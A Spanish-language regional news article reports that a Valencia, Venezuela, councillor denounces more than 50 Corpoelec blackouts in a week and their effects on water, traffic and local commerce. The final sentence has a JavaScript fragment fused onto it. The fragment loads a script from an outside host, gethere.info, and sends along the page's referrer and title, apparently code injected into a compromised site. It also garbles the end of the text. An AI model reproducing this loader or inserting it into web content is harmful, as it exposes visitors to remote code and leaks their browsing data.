Carabobo Destacados

Apagones regresaron a las comunidades de Valencia

 

Albeny Núñez Ramos. El edil del Concejo Municipal de Valencia (CMV), Manuel Molina, denunció que en la última semana se han registrado más de 50 apagones en diferentes comunidades lo que ha repercutido negativamente en el suministro de agua, internet y servicio de televisión, entre otros.

Explicó que en zonas como El Parral, El Trigal, Los Mangos, Los Nísperos y Agua Blanca del norte de Valencia, los cortes sin previo aviso de la Corporación Eléctrica Nacional (Corpoelec), ocurren hasta tres veces por día y en ocasiones duran de tres a cinco horas.

“Las irregularidades ocurren en la tarde y luego nuevamente en la noche, hay quienes  viven en zozobra y no saben que hacen para obtener solución del servicio público”, señaló el concejal al mencionar que el pasado lunes varios sectores quedaron hasta 12 horas sin energía.

Alegó que las fallas registradas causan daños en los aparatos y electrodomésticos de los vecinos, mientras que otros servicios se ven afectados, “las vías públicas como la avenida Bolívar colapsan porque los semáforos quedan inhabilitados y esto genera pérdidas al municipio el registrarse colas y caos en las horas más transitadas y eso no puede continuar”.

Con relación al sector comercio, el concejal por la Mesa de la Unidad Democrática (MUD), manifestó su inquietud porque no solamente están siendo afectados por la crisis económica, sino ahora por los cortes eléctricos.

“Las interrupciones generan perdidas, porque los comerciantes no pueden usar los puntos de venta, medio mayoritario actualmente para el pago de bienes y servicios, ante la falta de liquidez monetaria presente en el país”, indicó el edil de Valencia.

De esta manera, el parlamentario local, hizo un llamado a Corpoelec para que explique y presente un verdadero plan de contingencia dado a que son fallas puntuales, tomando en consideración que los apagones continúan y ya el pueblo está cansado del problema así como de la escasez de alimentos y medicinas; y carencia de seguridad.

“El problema a todas luces que atenta contra la calidad de vida de nuestros ciudadanos, el regreso de los apagones, lo que demuestra que el modelo actual colapsó, por lo que se hace necesario un gran cambio”, afirmó Molina.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;